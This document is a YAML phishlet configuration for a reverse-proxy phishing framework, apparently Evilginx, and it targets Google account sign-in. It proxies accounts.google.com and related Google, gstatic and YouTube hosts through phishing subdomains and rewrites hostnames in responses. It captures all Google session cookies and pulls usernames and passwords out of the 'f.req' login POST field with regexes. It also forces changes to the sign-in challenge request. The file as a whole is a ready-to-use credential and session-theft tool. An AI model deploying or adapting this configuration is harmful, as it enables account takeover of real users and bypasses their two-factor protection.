name: "Google"
author: "Simpler Hacking"
min_ver: "3.2.0"

proxy_hosts:
  - {
      phish_sub: "accounts",
      orig_sub: "accounts",
      domain: "google.com",
      session: true,
      is_landing: true,
      auto_filter: false,
    }
  - {
      phish_sub: "www",
      orig_sub: "www",
      domain: "google.com",
      session: false,
      is_landing: false,
    }
  - {
      phish_sub: "play",
      orig_sub: "play",
      domain: "google.com",
      session: false,
      is_landing: false,
      auto_filter: false,
    }
  - {
      phish_sub: "myaccount",
      orig_sub: "myaccount",
      domain: "google.com",
      session: true,
      is_landing: false,
      auto_filter: false,
    }
  - {
      phish_sub: "www",
      orig_sub: "www",
      domain: "gstatic.com",
      session: true,
      is_landing: false,
      auto_filter: true,
    }
  - {
      phish_sub: "fonts",
      orig_sub: "fonts",
      domain: "gstatic.com",
      session: true,
      is_landing: false,
    }
  - {
      phish_sub: "youtube",
      orig_sub: "accounts",
      domain: "youtube.com",
      session: false,
      is_landing: false,
      auto_filter: false,
    }
  - {
      phish_sub: "ssl",
      orig_sub: "ssl",
      domain: "gstatic.com",
      session: false,
      is_landing: false,
      auto_filter: false,
    }

sub_filters:
  - {
      triggers_on: "apis.google.com",
      orig_sub: "apis",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "google.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "google.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "www",
      domain: "google.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "www",
      domain: "google.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "www",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "myaccount",
      domain: "google.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "myaccount",
      domain: "google.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "myaccount",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "play",
      domain: "google.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "play",
      domain: "google.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "play",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "apis",
      domain: "google.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "apis",
      domain: "google.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "apis",
      domain: "google.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "www.gstatic.com",
      orig_sub: "www",
      domain: "gstatic.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "ssl.gstatic.com",
      orig_sub: "ssl",
      domain: "gstatic.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "fonts.gstatic.com",
      orig_sub: "fonts",
      domain: "gstatic.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "ssl",
      domain: "gstatic.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "ssl",
      domain: "gstatic.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "ssl",
      domain: "gstatic.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "content",
      domain: "googleapis.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "content",
      domain: "googleapis.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "content",
      domain: "googleapis.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "youtube.com",
      search: "https://{hostname}",
      replace: "https://{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "youtube.com",
      search: "https%3A%2F%2{hostname}/",
      replace: "https%3A%2F%2{hostname}/",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }
  - {
      triggers_on: "accounts.google.com",
      orig_sub: "accounts",
      domain: "youtube.com",
      search: "{hostname}",
      replace: "{hostname}",
      mimes:
        [
          "text/html",
          "application/json",
          "application/javascript",
          "application/x-javascript",
          "application/ecmascript",
          "text/javascript",
          "text/ecmascript",
        ],
    }

auth_tokens:
  - domain: ".google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.com"
    keys: [".*,regexp"]
  - domain: "accounts.google.bg"
    keys: [".*,regexp"]
credentials:
  username:
    key: "f.req"
    search: '\],"([^"]*)"\]$'
    type: "post"
  password:
    key: "f.req"
    search: ',\["([^"]*)",'
    type: "post"
  custom:
    - key: "useragent"
      search: "(.*)"
      type: "post"
    - key: "browser"
      search: "(.*)"
      type: "post"
    - key: "engine"
      search: "(.*)"
      type: "post"
    - key: "platform"
      search: "(.*)"
      type: "post"
auth_urls:
  - "/CheckCookie"
  - "/ManageAccount"
login:
  domain: "accounts.google.com"
  path: "/ServiceLogin"
  #path: '/signin/v2/identifier?hl=en&flowName=GlifWebSignIn&flowEntry=ServiceLogin'

force_post:
  - path: "/_/signin/sl/challenge"
    search:
      - { key: "f.req", search: ".*" }
      - { key: "continue", search: ".*" }
    force:
      - { key: "continue", value: "" }
    type: "post"
